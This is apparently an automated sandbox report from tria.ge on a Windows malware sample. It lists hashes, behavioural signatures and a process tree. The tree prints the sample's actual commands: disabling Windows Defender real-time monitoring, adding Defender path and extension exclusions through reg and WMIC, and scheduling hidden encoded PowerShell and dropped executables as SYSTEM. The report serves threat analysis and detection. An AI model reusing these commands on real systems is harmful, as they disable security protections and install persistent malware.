Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    218s
  • max time network
    249s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    01/07/2024, 05:06

General

  • Target

    ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe

  • Size

    7.3MB

  • MD5

    2e71f91c22ed33da2d442a0eb12fe951

  • SHA1

    0c2eec9c3ff33ef905204a8ae205f533571a1cef

  • SHA256

    ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b

  • SHA512

    8602a9698c944d5962e190feb04b7ebb471a828f828e9b97c4a9352a45224935d2b9860b2d7d75ab03eb881e5eb380a11bb54ca3f2fa61e068d55882c5929269

  • SSDEEP

    196608:91OFx9BggZVkFSL0ng/0O9pr89EDAtJ1i1Lzv0GB+grfTuD:3ODH30qD07sFzv3B+SC

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 30 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe
    "C:\Users\Admin\AppData\Local\Temp\ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Users\Admin\AppData\Local\Temp\7zS1A83.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Users\Admin\AppData\Local\Temp\7zS1EE6.tmp\Install.exe
        .\Install.exe /iLdidEHGZ "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2744
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2712
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2864
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2572
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2736
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "brlogsXZdQLKJRjYtj" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe\" OF /KgdidrG 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2436
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 504
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1720
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9F66153D-A706-4186-9A8C-3E56C053AED2} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe
      C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe OF /KgdidrG 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "giIFGvDdF" /SC once /ST 02:33:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1932
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "giIFGvDdF"
        3⤵
          PID:2792
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "giIFGvDdF"
          3⤵
            PID:1904
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:1496
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:408
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:836
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:2880
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gZgEDmWMy" /SC once /ST 04:28:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2424
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gZgEDmWMy"
                3⤵
                  PID:1064
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gZgEDmWMy"
                  3⤵
                    PID:2116
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:2400
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:2088
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1592
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2204
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:3024
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:3048
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:3028
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:3052
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:1324
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:1988
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:1884
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:1004
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf"
                                    3⤵
                                      PID:2592
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:2812
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2860
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2732
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2552
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2504
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2436
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2824
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2108
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1676
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2768
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1956
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2332
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1204
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2676
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1640
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1932
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2680
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2260
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2308
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:2816
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:696
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1468
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:1720
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2304
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:484
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:2356
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:2984
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:852
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1296
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2420
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:1812
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2856
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2080
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1124
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:1248
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:2112
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:816
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gNgVmLWKk" /SC once /ST 03:07:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2200
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gNgVmLWKk"
                                                                          3⤵
                                                                            PID:2120
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gNgVmLWKk"
                                                                            3⤵
                                                                              PID:376
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:1004
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:2932
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2592
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2448
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "bdmBPZkQYKMDiCzlG" /SC once /ST 00:39:32 /RU "SYSTEM" /TR "\"C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe\" 5U /WuvkdidDy 525403 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:2572
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "bdmBPZkQYKMDiCzlG"
                                                                                      3⤵
                                                                                        PID:2864
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 492
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:2472
                                                                                    • C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe
                                                                                      C:\Windows\Temp\PfAmACXkWBLbKqPZ\wQaztmnOsDzmFZa\IbhinZm.exe 5U /WuvkdidDy 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Modifies system certificate store
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1220
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "brlogsXZdQLKJRjYtj"
                                                                                        3⤵
                                                                                          PID:2764
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:1088
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:2508
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:1976
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2624
